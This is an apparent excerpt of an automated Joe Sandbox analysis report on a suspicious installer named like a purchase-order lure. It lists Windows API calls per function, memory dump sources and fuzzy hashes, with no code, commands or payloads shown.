                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID:
                                                  • API String ID: 1941528284-0
                                                  • Opcode ID: 35c3f6a2f7561330f216546da6f00e51e59c92991de695342cfad82cb0a0900a
                                                  • Instruction ID: adf8bb8e975ebc770d7c27afbe064fe35cfd0cbf1071ecc95f96a86e7a4b9e55
                                                  • Opcode Fuzzy Hash: 35c3f6a2f7561330f216546da6f00e51e59c92991de695342cfad82cb0a0900a
                                                  • Instruction Fuzzy Hash: 8A41C671900105BACF117BA5CD85DAE3A79EF45368F21823FF422B10E1D73D8E91AA2D
                                                  APIs
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                  • Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
                                                  • Opcode Fuzzy Hash: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                  • Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                  • GetClientRect.USER32(?,?), ref: 00401E0A
                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                  • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: bd4e520b8cc5a1f7d7462dde4cdf2bafadf22cf4d53fc2066ec95edb4c3fdfff
                                                  • Instruction ID: 9dfadece7afb1d036d9df0696a088785edc369755c046bee68b18a74b307b48a
                                                  • Opcode Fuzzy Hash: bd4e520b8cc5a1f7d7462dde4cdf2bafadf22cf4d53fc2066ec95edb4c3fdfff
                                                  • Instruction Fuzzy Hash: DC213B72900119AFCF05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E76
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401EF8
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: e7871214ef899597a5c21e8ed64a158595def24cf366e312614ef02057251c7c
                                                  • Instruction ID: e238c2cdee3483520897b3d1e8694375d24364cfb31141c1d88cf39a281bb876
                                                  • Opcode Fuzzy Hash: e7871214ef899597a5c21e8ed64a158595def24cf366e312614ef02057251c7c
                                                  • Instruction Fuzzy Hash: 9D018871904250EFE7005BB4EE99BDD3FB4AF55301F20897AF142B61E2C6B904459BED
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 7ad168aabce29fd4aea1c4775643c0a159d1592a8197a50a1d283e8c160106aa
                                                  • Instruction ID: 990765c93fade27e2bb35c4ad61bbd9c2d50a24465aba9d794b4eebee5297a47
                                                  • Opcode Fuzzy Hash: 7ad168aabce29fd4aea1c4775643c0a159d1592a8197a50a1d283e8c160106aa
                                                  • Instruction Fuzzy Hash: 30217E7191421AAEEB05AFA4D94AAFE7BB0EF44304F10453EF505B61D0D7B88941DB98
                                                  APIs
                                                    • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                    • Part of subcall function 0040601C: CharNextW.USER32(?,?,00425750,?,00406090,00425750,00425750,771B3420,?,771B2EE0,00405DCE,?,771B3420,771B2EE0,00434000), ref: 0040602A
                                                    • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                    • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                  • lstrlenW.KERNEL32(00425750,00000000,00425750,00425750,771B3420,?,771B2EE0,00405DCE,?,771B3420,771B2EE0,00434000), ref: 004060D2
                                                  • GetFileAttributesW.KERNEL32(00425750,00425750,00425750,00425750,00425750,00425750,00000000,00425750,00425750,771B3420,?,771B2EE0,00405DCE,?,771B3420,771B2EE0), ref: 004060E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: PWB
                                                  • API String ID: 3248276644-4275379341
                                                  • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                  • Instruction ID: 57cdea5284265d05e194d97f438d60f20e9a33b3e1b8f85ab2b18f32e1c9dba5
                                                  • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                  • Instruction Fuzzy Hash: F6F04425184A6259E622B73A0C05AAF25098F82324B4B463FF803B22C1DF3D8963917E
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 004056CA
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 0040571B
                                                    • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                  • Instruction ID: a38bd53333deb2965cf6bcfe27cab5e967b0379a0e7dc5bd4266cb97908be95f
                                                  • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                  • Instruction Fuzzy Hash: A901B131200708EFDB204F90DEC0A9B3665FB84750F504036F605761D1D77A8C92AE2D
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004061DF
                                                  • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403663,00436000,00436800,00436800,00436800,00436800,00436800,00436800,0040394F), ref: 004061FA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: nsa
                                                  • API String ID: 1716503409-2209301699
                                                  • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                  • Instruction ID: f348173cd445ce0cff63ab1922c44f7ab34be52ec2d52f6d3f60174017d9ed76
                                                  • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                  • Instruction Fuzzy Hash: 3BF06D76701204BBEB109B59DD05E9AB7A8EBA1710F11803EEA01A6240E6B099648764
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q
                                                  • API String ID: 0-4102054182
                                                  • Opcode ID: ded0af69f50e52e4e370fc57412cfd4e76067237c7f90547c49a19c5c0a528c7
                                                  • Instruction ID: a7d33865b9663c24b3efade0da4837f27f695e70928eac481252a4e2f74b635e
                                                  • Opcode Fuzzy Hash: ded0af69f50e52e4e370fc57412cfd4e76067237c7f90547c49a19c5c0a528c7
                                                  • Instruction Fuzzy Hash: 65B12B34A10219DFEB14DB65D59469EB7F3FF88300F258529D806AB395DB39DC42CB90
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                  • Instruction ID: 24c32228aea39238aae05165091b6f794a4b9b1c66cd55bc1afee76a19a4bada
                                                  • Opcode Fuzzy Hash: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                  • Instruction Fuzzy Hash: 10A14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856ED856BB281C7786A86DF45
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                  • Instruction ID: b8cb9ce97df986fef79018f719ec18ee870a51f75f9c549f23c9243a2682c43e
                                                  • Opcode Fuzzy Hash: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                  • Instruction Fuzzy Hash: 48912370D04228CBDF28CF98C8947ADBBB1FF44305F14856AD856BB291C778A986DF45
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                  • Instruction ID: 4da454054b0c3dd02772a9c96e50ae6a11cdbe5b18e0bc5540401a1e7d1606fc
                                                  • Opcode Fuzzy Hash: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                  • Instruction Fuzzy Hash: E4813471D04228DBDF24CFA8C8847ADBBB1FF45305F24816AD456BB281C778AA86DF45
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                  • Instruction ID: a75c210e76fb72c91da92bd055febaaadf45c37f1dc492509737fdaa257f63d6
                                                  • Opcode Fuzzy Hash: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                  • Instruction Fuzzy Hash: 2D817731D04228DBDF24CFA8C844BADBBB1FF44315F20856AD856BB281C7796A86DF45
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                  • Instruction ID: 2ce83fc52b21f36f835e1fdafd5cf74e6ced0850754c4da96a209bb8fab2d9ce
                                                  • Opcode Fuzzy Hash: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                  • Instruction Fuzzy Hash: 11712471D04228DBDF28CFA8C8847ADBBB1FF48305F15806AD856B7281C778A986DF55
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                  • Instruction ID: eaca5e257ecba6057ed761995cb39389c4d8ec983a179070fe5d03b82c062b57
                                                  • Opcode Fuzzy Hash: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                  • Instruction Fuzzy Hash: BF713671E04218DBDF28CFA8C884BADBBB1FF44305F14806AD856BB281C7786986DF55
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                  • Instruction ID: 26522df2f7fda751442351ae768cbf4c3b612a3e7fb567ef5040218afec9c9a0
                                                  • Opcode Fuzzy Hash: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                  • Instruction Fuzzy Hash: CB713771D04228DBEF28CF98C8447ADBBB1FF44305F15806AD856B7281C778A946DF45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LRq$LRq$$q$$q
                                                  • API String ID: 0-2204215535
                                                  • Opcode ID: ff161d039dded08392224478ad581eb1afed45a9e7ea68a49ffce78211c36746
                                                  • Instruction ID: 639d9db1c0e3c26133b5b95047871175d417559b9525592b6d9f0a324f68eb28
                                                  • Opcode Fuzzy Hash: ff161d039dded08392224478ad581eb1afed45a9e7ea68a49ffce78211c36746
                                                  • Instruction Fuzzy Hash: 76518F34B103058FEB18DB68D891A6A77F2BF89310F248569E805AB395DF35EC45CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q
                                                  • API String ID: 0-4102054182
                                                  • Opcode ID: 1915f63fe42a62e884bca6487c7af86d724d67fd4adf7b1d19ffc87741da6b66
                                                  • Instruction ID: 25ce56c190add1848449ca34076c820354ae6d084c8702af109b1e9dec1164b6
                                                  • Opcode Fuzzy Hash: 1915f63fe42a62e884bca6487c7af86d724d67fd4adf7b1d19ffc87741da6b66
                                                  • Instruction Fuzzy Hash: C2518178A10306CFDB25DA64E48069DB7F2EF89351F72452AE406EB385DB31DC42CB90
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
                                                  • CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                  • Instruction ID: 5f3436636367d0d5bc92f6b0e419d408aad35ecbe6557c54d873c5627a92c34c
                                                  • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                  • Instruction Fuzzy Hash: E4F0BB35604414FFC702DFA5DD00D9EBBA8EF46350B2640B9F841FB211D674DE129B99